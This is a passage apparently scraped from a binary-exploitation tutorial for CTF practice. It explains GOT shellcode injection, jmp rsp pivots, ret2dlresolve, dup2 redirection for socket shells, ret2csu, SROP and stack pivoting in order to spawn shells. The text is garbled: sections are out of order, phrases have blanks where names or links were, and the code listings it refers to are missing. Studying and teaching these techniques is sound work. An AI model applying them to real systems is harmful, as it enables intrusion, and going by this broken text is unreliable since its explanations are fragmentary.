to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets
, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets
to where we wrote the shellcode, perfectly executing what we just inputted.
I wonder what you could do with this.
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets
as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.
Thank to clubby789 and Faith from the HackTheBox Discord server, I found out that the GOT often has Executable permissions simply because that's the default permissions when there's no NX. If you have a more recent kernel, such as 5.9.0
, the default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r
to grab the kernel version and check if it's 5.9.0
; if it is, you'll have to find another RWX region to place your shellcode (if it exists!).
You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if
statement.
The chance of jmp esp
gadgets existing in the binary are incredible low, but what you often do instead is find a sequence of bytes that code for jmp rsp and jump there - jmp rsp
is \xff\xe4
in shellcode, so if there's is any part of the executable section with bytes in this order, they can be used as if they are a jmp rsp
.
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret
has occured, so your shellcode goes after it.
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like
Where 0x20
is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
The 10
is just a placeholder. Once we hit the pause()
, we attach with radare2 and set a breakpoint on the ret
, then continue. Once we hit it, we find the beginning of the A
string and work out the offset between that and the current value of RSP - it's 128
!
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp
will change, so you might have to leak PIE base!
Resolving our own libc functions
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its choice (such as system
) into the PLT. This then means the attacker can use the PLT function as if it was originally part of the binary, bypassing ASLR (if present) and requiring no libc leaks.
Dynamically-linked ELF objects import libc
functions when they are first called using the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT and attempt to resolve the symbol. During this process a "resolver" is called.
For all these screenshots, I broke at read@plt
. I'm using GDB with the pwndbg
plugin as it shows it a bit better.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it points back to the instruction after the jmp
in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the binary. Faking these 3 structures could enable us to trick the linker into resolving a function of our choice, and we can also pass parameters in (such as /bin/sh
) once resolved.
There are 3 structures we need to fake.
The JMPREL
segment (.rel.plt
) stores the Relocation Table, which maps each entry to a symbol.
These entries are of type Elf32_Rel
:
The column name
coresponds to our symbol name. The offset
is the GOT entry for our symbol. info
stores additional metadata.
Note the due to this the R_SYM
of gets
is 1
as 0x107 >> 8 = 1
.
Much simpler - just a table of strings for the names.
Symbol information is stores here in an Elf32_Sym
struct:
The most important value here is st_name
as this gives the offset in STRTAB of the symbol name. The other fields are not relevant to the exploit itself.
We now know we can get the STRTAB
offset of the symbol's string using the R_SYM
value we got from the JMPREL
, combined with SYMTAB
:
Here we're reading SYMTAB + R_SYM * size (16)
, and it appears that the offset (the SYMTAB
st_name
variable) is 0x10
.
And if we read that offset on STRTAB
, we get the symbol's name!
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset
value and jump to the beginning of the .plt
section. A few instructions later, the dl-resolve()
function is called, with reloc_offset
being one of the arguments. It then uses this reloc_offset
to calculate the relocation and symtab entries.
To make it super simple, I made it in assembly using pwntools:
The binary contains all the gadgets you need! First it executes a read
syscall, writes to the stack, then the ret
occurs and you can gain control.
But what about the /bin/sh
? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:
As we mentioned before, we need the following layout in the registers:
To get the address of the gadgets, I'll just do objdump -d vuln
. The address of /bin/sh
can be gotten using strings:
The offset from the base to the string is 0x1250
(-t x
tells strings
to print the offset as hex). Armed with all this information, we can set up the constants:
Now we just need to populate the registers. I'll tell you the padding is 8
to save time:
And wehey - we get a shell!
File Descriptors and Sockets
File Descriptors are integers that represent conections to sockets or files or whatever you're connecting to. In Unix systems, there are 3
main file descriptors (often abbreviated fd) for each application:
These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:
Here you're piping stderr
to /dev/null
, which is the same principle.
Many binaries in CTFs use programs such as socat
to redirect stdin
and stdout
(and sometimes stderr
) to the user when they connect. These are super simple and often require no more than a replacement of
With the line
Others, however, implement their own socket programming in C. In these scenarios, stdin
and stdout
may not be shown back to the user.
The reason for this is every new connection has a different fd. If you listen in C, since fd 0-2 is reserved, the listening socket will often be assigned fd 3
. Once we connect, we set up another fd, fd 4
(neither the 3
nor the 4
is certain, but statistically likely).
In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0
, 1
and 2
for its I/O.
Here we have to tell the program to duplicate the file descriptor in order to redirect stdin
and stderr
to fd 4
, and glibc provides a simple way to do so.
The dup
syscall (and C function) duplicates the fd and uses the lowest-numbered free fd. However, we need to ensure it's fd 4
that's used, so we can use dup2()
. dup2
takes in two parameters: a newfd
and an oldfd
. Descriptor oldfd
is duplicated to newfd
, allowing us to interact with stdin
and stdout
and actually use any shell we may have popped.
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win()
, and to do that you have to populate the register rdx
. Try what we've talked about, and then have a look at the answer if you get stuck.
We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.
Note I'm not popping RBX, despite the call
. This is because RBX ends up being 0
anyway, and you want to mess with the least number of registers you need to to ensure the best success.
Now we need to find a memory location that has the address of win()
written into it so that we can point r15
at it. I'm going to opt to call gets()
again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary then dcu main
to contiune until main. Now let's check permissions:
The third location is RW, so let's check it out.
The address 0x404028
appears unused, so I'll write win()
there.
To do this, I'll just use the ROP class.
Now we have the address written there, let's just get the massive ropchain and plonk it all in
Don't forget to pass a parameter to the gets()
:
And we have successfully controlled RDX - without any RDX gadgets!
As you probably noticed, we don't need to pop off r12 or r13, so we can move POP_CHAIN
a couple of intructions along:
As of , the CSU has been hardened to remove the useful gadgets. is the offendor, and it essentially removes __libc_csu_init
(as well as a couple other functions) entirely.
Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way can not run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.
As with the , I made the binary using the pwntools ELF features:
It's quite simple - a read
syscall, followed by a pop rax; ret
gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Once again, I added /bin/sh
to the binary:
First let's plonk down the available gadgets and their location, as well as the location of /bin/sh
.
From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8
bytes until RIP, then you'll need to trigger a sigreturn
, followed by the values of the registers.
The triggering of a sigreturn
is easy - sigreturn is syscall 0xf
(15
), so we just pop that into RAX and call syscall
:
Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame()
that handles the order for us.
Now we just need to decide what the register values should be. We want to trigger an execve()
syscall, so we'll set the registers to the values we need for that:
However, in order to trigger this we also have to control RIP and point it back at the syscall
gadget, so the execve actually executes:
We then append it to the payload and send.
Controlling registers when gadgets are lacking
ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the , but a summary is as follows:
When an application is dynamically compiled (compiled with libc linked to it), there is a selection of functions it contains to allow the linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init
, which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8
. The first gadget chain allows us to control both r15
and rbx
in that series of huge pop
operations, meaning whe can control where the second gadget calls afterwards.
Note it's call qword [r15 + rbx*8]
, not call qword r15 + rbx*8
. This means it'll calculate r15 + rbx*8
then go to that memory address, read it, and call that value. This mean we have to find a memory address that contains where we want to jump.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15
and rbx
to workable values.
This means we can potentially pull off syscalls for execve
, or populate parameters for functions such as write()
.
You may wonder why we would do something like this if we're linked to libc - why not just read the GOT? Well, some functions - such as write()
- require three parameters (and at least 2), so we would require ret2csu to populate them if there was a lack of gadgets.
Note that the outlines how if newfd
is in use it is silently closed, which is exactly what we wish.
Name
fd
stdin
0
stdout
1
stderr
2
Lack of space for ROP
Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.
Possibly the simplest, but also the least likely to exist. If there is one of these, you're quite lucky.
If you can find a pop <reg>
gadget, you can then use this xchg
gadget to swap the values with the ones in RSP. Requires about 16 bytes of stack space after the saved return pointer: